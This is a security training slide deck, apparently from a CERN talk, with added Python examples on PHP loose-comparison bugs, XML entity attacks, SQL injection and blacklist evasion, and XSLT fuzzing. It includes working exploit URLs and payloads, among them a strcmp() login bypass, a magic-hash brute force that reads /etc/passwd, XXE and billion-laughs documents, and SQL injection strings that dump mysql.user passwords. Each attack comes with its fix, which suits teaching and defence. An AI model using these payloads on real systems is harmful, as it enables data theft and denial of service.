Application security
Not so obvious vulnerabilities
Nicolas Grégoire / Agarri, at CERN
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
$ Whoami
Nicolas Grégoire / Agarri Founder
13 years of Infosec experience
Half consultant, half end-user
Always with a "breaker" mentality
Doing Pentesting, Training, Research
The Target
<?php
$key = "llocdpocuzion5dcp2bindhspiccy";
$flag = strcmp($key, $_GET['key']);
if ($flag == 0) {
    print "Welcome!";
} else {
    print "Bad key!";
}
?>
strcmp()
Pasted from the PHP 5 documentation:
http://www.php.net/manual/en/function.strcmp.php
int strcmp ( string $str1 , string $str2 )
Note that this comparison is case sensitive.
Returns < 0 if str1 is less than str2; > 0 if str1 is greater than str2, and 0 if they are equal.
The Idea
Parameters to a PHP script can be:
Strings (?key=abc)
Arrays (?key[]=abc, or simply ?key[])
The doc for strcmp() doesn't state what happens if $_GET['key'] is an array
Let's try...
var_dump(strcmp('', array())) => NULL
PHP 5 (and 7) emits a warning ("expects parameter 2 to be string, array given") and returns NULL instead of an int. PHP 8 throws a TypeError here instead, so the bypass below only works on the older majors.
The Hack
The loose comparison operator "==" is used
"===" would have checked both type and value (NULL === 0 is false)
"==" converts the operands before comparing: NULL == 0 is true, so the "Welcome!" branch is taken
The Exploit
http://target/strcmp.php?key[]
DEMO
Typo3
TYPO3's jumpurl feature serves almost any file, provided the juHash parameter matches:
http://foobar/index.php?jumpurl=target.txt&locationData=1::1&JuSecure=1&juHash=31337f0023
Here's a simplified version:
http://127.0.0.1/cern/typo3.php?f=/etc/motd&h=3be1c7180e
The Target
<?php
$file = $_GET['f'];
$hash = $_GET['h'];
$key = "SuperSecretPassword!";
$target = substr(md5($key . $file), 0, 10);
if ($hash == $target) {
    print "Hash [$target]\n";
    print "File [$file]\n";
    readfile($file);
}
?>
The Crypto
MD5: 32 nibbles / 16 bytes
256^16 = 3.4 * 10^38 possible digests
Truncated to 10 hex characters (5 bytes)
256^5 = 1.1 * 10^12
Brute-forcing a given truncated hash takes on average 550 billion tries
That seems quite secure
But...
<?php
if ("100" == "0100")     { … }  // true
if ("100" == "10e1")     { … }  // true
if ("100" == "1e2")      { … }  // true
if ("100" == "001e0002") { … }  // true
?>
Two numeric strings are compared as numbers, not character by character. This still holds in PHP 8, whose stricter comparison rules only changed number-versus-string cases.
The Hack
Any numeric string whose value is zero compares equal to "0", for instance:
0000000000
0e01234567, 0e76543210, 000e000123, 0000000e44
"0e[0-9]{8}" is read as a float literal, 0 * 10^n, which is zero
The Maths
We need a hash like "0e[0-9]{8}"
P(first byte is "0e"): 1/256
P(the other 8 nibbles are "[0-9]"): (10/16)^8 = 0.023
P("0e[0-9]{8}") = 0.023 / 256 = 9.1 * 10^-5, about 0.009%
Each filename is an independent try with success probability P, so an attacker needs on average 1/P, roughly 11,000 tries
This is a lower bound: other zero-valued forms such as "0000000000" or "00000e0012" also match
No knowledge of $key is required: the target prints "Hash [...]" exactly when a try succeeds
The Exploit
Fixed hash: the "h" parameter is always "0"
Variable filename: prepend extra "/" characters; the path still resolves to the same file, but md5($key . $file) changes with every variant
http://127.0.0.1/cern/typo3.php?f=//[...]//etc/passwd&h=0
Fix: compare with "===" (or hash_equals()) rather than "=="
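As an added example (not code from the slides), the following Python script models the two loose-comparison behaviours used in this section, NULL == 0 from the strcmp() target and numeric-string comparison from the TYPO3 target, and then runs the blind search an attacker would perform: hash fixed to "0", filename varied until the server accepts. The server secret, the comparison model (a simplified version of PHP 5/7 rules, without the old 0x hex-string quirk) and the filename variants are constructed for the example; the variants go slightly beyond the slides by mixing "/." segments with the extra slashes, which keeps each candidate short while still resolving to the same file.

```python
import hashlib
import re

# Simplified model of what PHP 5/7 accepts as a "numeric string" for ==.
# Leading whitespace is allowed; PHP 5's 0x.. hex-string quirk is left out.
_NUMERIC_STRING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?$")


def php_loose_eq(a, b):
    """Emulate PHP's == for the operand kinds used on the slides:
    NULL vs int (both sides become bool) and string vs string
    (compared as numbers when both sides are numeric strings)."""
    if a is None or b is None:
        return bool(a) == bool(b)          # NULL == 0 is true
    if isinstance(a, str) and isinstance(b, str):
        if _NUMERIC_STRING.match(a) and _NUMERIC_STRING.match(b):
            return float(a) == float(b)    # "0" == "0e12345678" is true
        return a == b
    return a == b


KEY = "SuperSecretPassword!"  # constructed server secret; the attacker never learns it


def truncated_hash(file):
    """substr(md5($key . $file), 0, 10) from the simplified TYPO3 target."""
    return hashlib.md5((KEY + file).encode()).hexdigest()[:10]


def server_allows(file, hash_param):
    """The vulnerable check: truncated MD5 compared with == instead of ===."""
    return php_loose_eq(hash_param, truncated_hash(file))


def equivalent_path(n, path):
    """n-th spelling of the absolute `path` that still resolves to the same file:
    each bit of n becomes a "/." or "/" segment in front of it (assumed layout,
    generalising the slides' "//[...]//etc/passwd")."""
    prefix = "".join("/." if bit == "1" else "/" for bit in format(n, "b"))
    return prefix + path


def find_magic_filename(path="/etc/passwd", max_tries=200_000):
    """Blind search, as the attacker runs it: keep h=0 and change the filename
    until the server says yes. Returns (filename, tries) or None.
    With P ~ 9.1e-5 per try, about 11,000 tries are expected."""
    for n in range(max_tries):
        candidate = equivalent_path(n, path)
        if server_allows(candidate, "0"):
            return candidate, n + 1
    return None


if __name__ == "__main__":
    print("NULL == 0 :", php_loose_eq(None, 0))
    print('"100" == "1e2" :', php_loose_eq("100", "1e2"))
    print(find_magic_filename())
```

Running the script prints a filename such as `/.//./.../etc/passwd` together with the number of attempts; `truncated_hash()` of that name is a string like `0e12345678`, which PHP's `==` treats as zero.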
DEMO
Billion Laughs attack
<!DOCTYPE entry [
  <!ENTITY lol0 "lol lol lol lol lol lol lol ">
  <!ENTITY lol1 "&lol0;&lol0;&lol0;&lol0;&lol0;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;">
]>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>PoC for a LOL DoS</title>
  <entry>
    <title>&lol6;</title>
  </entry>
</feed>
Each level expands five times: &lol6; becomes 5^6 = 15,625 copies of lol0, about 440 KB of text from a document under 1 KB, and every extra level multiplies that by five again.
DEMO
XML eXternal Entities
<!DOCTYPE entry [
  <!ENTITY foo SYSTEM "file://etc/passwd">
]>
<feed xmlns="http://www.w3.org/2005/Atom">
  <title>PoC for a XXE attack</title>
  <entry>
    <title>&foo;</title>
  </entry>
</feed>
URL Handlers
URL schemes the XML parser can fetch external entities from (PHP stream wrappers included):
file:// and UNC-style //srv/ paths
http:// https://
ftp:// tftp://
gopher:// ldap://
php:// ssh2.sftp://
And more...
Risks
Read local files
Steal NTLM hashes (a //server/share path makes a Windows host authenticate to the attacker's SMB server)
Access services restricted by IP address (server-side request forgery)
Reach other machines (hop through a firewall)
Brute-force credentials via SFTP (ssh2.sftp://user:pass@host/)
Craft text-oriented packets using gopher://
And more...
DEMO
XML Entities
XML document:
<!DOCTYPE doc [ <!ENTITY foobar SYSTEM "/etc/passwd"> ]>
PHP code:
if (strpos($file_content, '<!ENTITY') !== FALSE) {
    print 'Attack detected';
    exit;
}
![Page 33: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/33.jpg)
strpos()
Pasted from the PHP 5 documentation:
http://www.php.net/manual/en/function.strpos.php
int strpos ( string $haystack , mixed $needle )
Returns the position of where the needle exists relative to the beginning of the haystack string. Also note that string positions start at 0, and not 1. Returns FALSE if the needle was not found.
![Page 34: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/34.jpg)
The analysis
The strict operator "!==" is used
No way to confuse FALSE (not found) with 0 (found at offset 0)
A document starting with "<!ENTITY" would not be well-formed anyway
The detected string is a literal
No way to play with case or spacing
So, is it secure?
![Page 35: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/35.jpg)
The Idea
strpos() is byte-oriented: it looks for the exact ASCII byte sequence "<!ENTITY"
The underlying XML parser, on the other hand, decodes the document's character encoding first
Let's encode our XML document
![Page 36: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/36.jpg)
The Hack
UTF-7 and UTF-8 are not interesting: ASCII letters keep their byte value
'A': 0x41
UTF-16 seems OK: every ASCII character gets a 0x00 byte next to it
'A': 0x00 0x41 (big-endian) or 0x41 0x00 (little-endian)
$ iconv --from-code=ascii --to-code=utf-16 < a.xml > b.xml
The parser detects the encoding from the byte-order mark and still processes the entity declaration; strpos() never sees the bytes "<!ENTITY"
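The following Python script is an added example, not code from the slides; it covers both the XML Risks section (billion laughs and XXE) and the UTF-16 bypass above. It contrasts the byte-level blacklist from the PHP snippet with a check done at the parser level: expat is told to refuse any entity declaration or external entity reference, so the verdict does not depend on how the document was encoded. The documents are constructed from the slide text (the XXE sample uses the `file:///etc/passwd` URI form and a three-level laughs document so that it stays small); `classify()` and its return shape are assumptions of the example.

```python
import xml.parsers.expat as expat


class UnsafeXML(Exception):
    """Raised when a document declares entities or references external ones."""


def naive_blacklist_hit(data: bytes) -> bool:
    """The slides' PHP check, strpos($file_content, '<!ENTITY'), as a byte search."""
    return b"<!ENTITY" in data


def parse_refusing_entities(data: bytes) -> str:
    """Parse `data` with expat, aborting at the first entity declaration
    (internal or external) or external entity reference, and return the
    concatenated character data. Works for any encoding expat understands,
    because the BOM/encoding is decoded before the DTD is tokenised."""
    parser = expat.ParserCreate()
    chunks = []

    def entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        kind = "external" if system_id else "internal"
        raise UnsafeXML(f"{kind} entity declaration {name!r} refused")

    def external_ref(context, base, system_id, public_id):
        raise UnsafeXML(f"external entity reference to {system_id!r} refused")

    parser.EntityDeclHandler = entity_decl
    parser.ExternalEntityRefHandler = external_ref
    parser.CharacterDataHandler = chunks.append
    parser.Parse(data, True)
    return "".join(chunks)


# Constructed samples. XXE_UTF16 is the ASCII document re-encoded the way
# `iconv --to-code=utf-16` would emit it (byte-order mark included).
XXE_ASCII = (
    b'<!DOCTYPE entry [ <!ENTITY foo SYSTEM "file:///etc/passwd"> ]>'
    b'<feed xmlns="http://www.w3.org/2005/Atom"><title>PoC for a XXE attack</title>'
    b"<entry><title>&foo;</title></entry></feed>"
)
XXE_UTF16 = XXE_ASCII.decode("ascii").encode("utf-16")

BILLION_LAUGHS = (
    b'<!DOCTYPE entry [<!ENTITY lol0 "lol lol lol lol lol lol lol ">'
    b'<!ENTITY lol1 "&lol0;&lol0;&lol0;&lol0;&lol0;">'
    b'<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;">]>'
    b"<feed><title>&lol2;</title></feed>"
)
BENIGN = b"<feed><title>just a title</title></feed>"


def classify(data: bytes) -> dict:
    """Run both checks on one document and report what each concluded."""
    try:
        parse_refusing_entities(data)
        parser_verdict = "accepted"
    except UnsafeXML as exc:
        parser_verdict = f"refused: {exc}"
    return {"blacklist_hit": naive_blacklist_hit(data), "parser": parser_verdict}


if __name__ == "__main__":
    for name, doc in [("xxe ascii", XXE_ASCII), ("xxe utf-16", XXE_UTF16),
                      ("billion laughs", BILLION_LAUGHS), ("benign", BENIGN)]:
        print(name, classify(doc))
```

For the UTF-16 document the byte search reports no hit while the parser-level check refuses it; the same function also stops the billion-laughs document at its first declaration, before any expansion happens. In PHP the equivalent is to disable entity loading (libxml_disable_entity_loader() on old releases, the LIBXML_NOENT/LIBXML_DTDLOAD flags left off) rather than grepping the input.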
![Page 37: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/37.jpg)
DEMO
![Page 38: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/38.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 39: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/39.jpg)
Trivial Cleaning
<?php
$category = str_replace("'", "\'", $category);
$sql = "select TITLE, CONTENT, CATEGORY from postings where CATEGORY = '$category'";
$result = mysql_query($sql) or die("Invalid request: " . mysql_error());
?>
![Page 40: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/40.jpg)
The Idea
\ is used to escape '
But \ itself isn't escaped
![Page 41: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/41.jpg)
The Hack
If an attacker provides \'
The database sees \\' : an escaped backslash, then a quote that closes the string literal
![Page 42: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/42.jpg)
The Exploit
/sqli.php?x\' or 1=1 -- x
/sqli.php?x\' UNION SELECT user, password FROM mysql.user WHERE user="root" -- x
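As an added example (not from the slides), the Python script below shows exactly where MySQL stops reading the CATEGORY literal for the slides' first payload under the naive str_replace() escaping, under escaping that handles the backslash first, and with a bound parameter. The literal scanner implements MySQL's default quoting rules (backslash escapes the next character, '' is a literal quote); the SQLite table and the helper names are constructed for the example.

```python
import sqlite3


def naive_escape(value: str) -> str:
    """The slides' cleaning: str_replace("'", "\\'", $category). Backslashes untouched."""
    return value.replace("'", "\\'")


def proper_escape(value: str) -> str:
    """Escape the escape character before the quote (what mysql_real_escape_string
    does for these two characters, minus its charset handling)."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def mysql_literal_end(sql: str, start: int) -> int:
    """Index just past the single-quoted literal opening at sql[start], following
    MySQL's default rules: backslash escapes the next character, '' is a quote.
    Returns -1 if the literal never closes."""
    assert sql[start] == "'"
    i = start + 1
    while i < len(sql):
        c = sql[i]
        if c == "\\":
            i += 2                      # \x: skip the escaped character
        elif c == "'":
            if i + 1 < len(sql) and sql[i + 1] == "'":
                i += 2                  # '' inside the literal
            else:
                return i + 1            # closing quote
        else:
            i += 1
    return -1


def build_query(category: str, escape) -> str:
    return ("select TITLE, CONTENT, CATEGORY from postings where CATEGORY = '"
            + escape(category) + "'")


def injected_tail(category: str, escape) -> str:
    """What the SQL parser sees *after* the CATEGORY literal: empty when the
    user input stayed inside the quotes, otherwise the injected SQL."""
    sql = build_query(category, escape)
    start = sql.index("'")
    end = mysql_literal_end(sql, start)
    return sql[end:].strip() if end != -1 else "<unterminated literal>"


PAYLOAD = "x\\' or 1=1 -- x"   # the slides' first exploit, as the attacker types it


def parameterised_lookup(category: str):
    """The fix: let the driver bind the value, no escaping in application code.
    Backed by an in-memory SQLite table constructed for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("create table postings (TITLE, CONTENT, CATEGORY)")
    con.executemany("insert into postings values (?, ?, ?)",
                    [("t1", "c1", "news"), ("t2", "c2", PAYLOAD)])
    rows = con.execute("select TITLE from postings where CATEGORY = ?",
                       (category,)).fetchall()
    con.close()
    return [r[0] for r in rows]


if __name__ == "__main__":
    print("naive  :", repr(injected_tail(PAYLOAD, naive_escape)))
    print("proper :", repr(injected_tail(PAYLOAD, proper_escape)))
    print("bound  :", parameterised_lookup(PAYLOAD))
```

With the naive escaping the tail is `or 1=1 -- x'`, i.e. the attacker's SQL runs; with the backslash escaped first the tail is empty; with a bound parameter the payload is just a value that matches (or not) a row. Note that MySQL's NO_BACKSLASH_ESCAPES mode changes the quoting rules entirely, one more reason to leave escaping to the driver.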
![Page 43: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/43.jpg)
Outline
PHP Laxism
XML Risks
Blacklist Evasion
XSLT Madness
![Page 44: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/44.jpg)
Complex Blacklist
Forbidden items:
String "SELECT" (lc/uc)
String "UNION" (lc/uc)
String "mysql.user" (lc)
String "root" (lc)
Comments like " -- " and "/* */"
Spaces
![Page 45: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/45.jpg)
Complex Bypass
Strings "SELECT" and "UNION" (lc/uc): use mixed case (SeLeCt, UnioN)
String "mysql.user" (lc): backticks around the names (`mysql`.`user`)
String "root" (lc): hex literal 0x726F6F74
Comments like " -- " and "/* */": use # instead
Spaces: 0x09 (Tab), 0x0A (LF), 0x0B (Vertical Tab), 0x0C (Form Feed) or ... are all whitespace for MySQL
The Exploit
/sqli.php?x\'%0AUnioN%0BSeLeCt%0Cuser,password%0AFROM%0B`mysql`.`user`%0CWHERE%0Auser=0x726F6F74#
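An added example (not from the slides) that runs the two payloads from this section through the complex blacklist as described, then through a check that first normalises the input the way the MySQL lexer reads it (comments dropped, backticks removed, 0x literals decoded, every whitespace byte collapsed, case folded). The normaliser is an assumption of the example and models only the tricks the slides use; its point is that a blacklist which does not replicate the parser's view of the input is bypassed by construction, not that normalising makes blacklists safe.

```python
import re


def complex_blacklist_blocks(s: str) -> bool:
    """The slides' 'complex blacklist', taken literally: SELECT/UNION in all-lower
    or all-upper case, mysql.user, root, ' -- ' and /* */ comments, and spaces."""
    forbidden = ["SELECT", "select", "UNION", "union", "mysql.user", "root",
                 " -- ", "/*", "*/", " "]
    return any(item in s for item in forbidden)


def normalise(s: str) -> str:
    """Rewrite the input as MySQL will read it before looking for keywords."""
    s = re.sub(r"(#|--[ \t]).*?(\n|$)", " ", s)            # # and -- line comments
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)           # /* */ comments
    s = re.sub(r"`([^`]*)`", r"\1", s)                     # `mysql`.`user` -> mysql.user

    def hex_literal(m):                                    # 0x726F6F74 -> 'root'
        return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"

    s = re.sub(r"\b0x((?:[0-9a-fA-F]{2})+)\b", hex_literal, s)
    s = re.sub(r"[\t\n\x0b\x0c\r ]+", " ", s)              # every MySQL whitespace byte
    return s.lower()


def normalised_blacklist_blocks(s: str) -> bool:
    n = normalise(s)
    return any(k in n for k in ("select", "union", "mysql.user", "'root'"))


# The slides' two payloads, URL-decoded (constructed from the slide text).
PLAIN = "x\\' UNION SELECT user, password FROM mysql.user WHERE user=\"root\" -- x"
EVASIVE = ("x\\'\nUnioN\x0bSeLeCt\x0cuser,password\nFROM\x0b`mysql`.`user`"
           "\x0cWHERE\nuser=0x726F6F74#")


if __name__ == "__main__":
    for name, payload in (("plain", PLAIN), ("evasive", EVASIVE)):
        print(name, "blacklist:", complex_blacklist_blocks(payload),
              "normalised:", normalised_blacklist_blocks(payload))
        print("   reads as:", normalise(payload))
```

The evasive payload passes the literal blacklist and is caught once normalised, but the normaliser only knows the tricks listed on the previous slide; parameterised queries remove the whole category of problem.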
XSLT?
Functional programming language
Used to transform XML documents
Turing-complete
Available in:
Browsers, databases, web applications
Digital signatures, image viewers, ...
![Page 49: Php Vulns Slides](https://reader034.vdocuments.site/reader034/viewer/2022042520/577cc0fe1a28aba71191e088/html5/thumbnails/49.jpg)
Dumb Fuzzing
Take some valid files
Mutate these files
Feed the new files to the engine
Monitor CPU, RAM, processes, …
Analyze crashes
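The five steps above as a minimal harness, added here as an example and not the tooling the author used: mutate seed files with a few dumb operations (bit flips, byte overwrites, deletions and chunk duplication, the last of which is what inflates XML nesting and repetition), hand each case to the engine under a timeout, and bucket the outcome by signal and the tail of stderr. The command-line template, the bucketing scheme and the use of the current Python interpreter as a stand-in target are assumptions of the example; signal classification relies on POSIX return codes.

```python
import hashlib
import os
import random
import subprocess
import sys
import tempfile


def mutate(data: bytes, rng=None, rounds: int = 4) -> bytes:
    """Dumb, format-agnostic mutation of `data`."""
    rng = rng or random.Random()
    buf = bytearray(data)
    for _ in range(rounds):
        if not buf:
            buf.extend(b"<")
        op = rng.randrange(4)
        i = rng.randrange(len(buf))
        if op == 0:
            buf[i] ^= 1 << rng.randrange(8)            # flip one bit
        elif op == 1:
            buf[i] = rng.randrange(256)                # overwrite one byte
        elif op == 2:
            del buf[i:i + rng.randint(1, 8)]           # drop a few bytes
        else:
            j = min(len(buf), i + rng.randint(1, 64))  # duplicate a chunk
            buf[i:i] = buf[i:j] * rng.randint(2, 8)
    return bytes(buf)


def python_target(code: str):
    """Throw-away target: the current interpreter running `code` (stand-in for xsltproc)."""
    return [sys.executable, "-c", code]


def run_case(cmd, data: bytes, timeout: float) -> dict:
    """Write one case to a temp file, run `cmd` with '{}' replaced by its path,
    and classify: crash (killed by a signal), timeout, error (non-zero exit), ok."""
    with tempfile.NamedTemporaryFile(suffix=".xsl", delete=False) as f:
        f.write(data)
        path = f.name
    try:
        argv = [a.replace("{}", path) for a in cmd]
        try:
            proc = subprocess.run(argv, capture_output=True, timeout=timeout)
        except subprocess.TimeoutExpired:
            return {"verdict": "timeout", "signal": None, "bucket": "timeout"}
        if proc.returncode < 0:                        # POSIX: -N means signal N
            tail = proc.stderr.decode(errors="replace")[-200:]
            digest = hashlib.sha1(f"{-proc.returncode}:{tail}".encode()).hexdigest()
            return {"verdict": "crash", "signal": -proc.returncode, "bucket": digest[:8]}
        verdict = "ok" if proc.returncode == 0 else "error"
        return {"verdict": verdict, "signal": None, "bucket": None}
    finally:
        os.unlink(path)


def fuzz(cmd, seeds, iterations, timeout=5.0, rng_seed=1):
    """Run the loop; return one representative input per crash/timeout bucket."""
    rng = random.Random(rng_seed)
    findings = {}
    for _ in range(iterations):
        case = mutate(rng.choice(seeds), rng)
        result = run_case(cmd, case, timeout)
        if result["verdict"] in ("crash", "timeout") and result["bucket"] not in findings:
            findings[result["bucket"]] = case
    return findings


if __name__ == "__main__":
    # Real use: fuzz(["xsltproc", "{}", "input.xml"], [open(p, "rb").read() for p in seed_paths], 10000)
    seed = b"<xsl:stylesheet version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform'/>"
    print(run_case(python_target("import os,signal;os.kill(os.getpid(),signal.SIGSEGV)"), seed, 5.0))
```

Monitoring CPU and RAM, the fourth step on the slide, is what the timeout verdict approximates here; a production harness would add resource limits (ulimit, cgroups) and keep the stderr tail in the bucket so that distinct crash sites are not collapsed.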
Results
Plenty of (security related) bugs!
MSXML: CVE-2013-0007
libxslt: CVE-2012-2871, CVE-2012-2825, ...
Adobe Reader: CVE-2012-1525, CVE-2012-1530
Firefox: CVE-2012-3972, CVE-2012-0449
And more: Intel, Oracle, ...
Abuse of features
Very large set of features
Standardized versions: XSLT 1.0, XSLT 2.0, XSLT 3.0 (XSLT 1.1 never went beyond a working draft)
Community effort: EXSLT
Proprietary extensions: in nearly every engine
DEMO
Conclusion
Attacker:
Subtle bugs are hard
Subtle bugs are fun
Defender:
In order to build something secure, you need to investigate / understand each underlying technology!
Reducing complexity is the key
The End
Questions?
Contact:
Nicolas.gregoire (at) agarri.fr
Agarri_FR on Twitter
References
http://www.php.net/manual/en/types.comparisons.php
http://www.php.net/manual/en/function.strcmp.php
http://www.php.net/manual/en/function.strpos.php
http://gregorkopf.de/slides_berlinsides_2010.pdf
http://erpscan.com/wp-content/uploads/2012/11/SSRF.2.0.poc_.pdf
http://webstersprodigy.net/2012/11/09/csaw-2012-quals-tutorialwriteup/
http://code.google.com/p/ouspg/wiki/Radamsa
http://www.metasploit.com/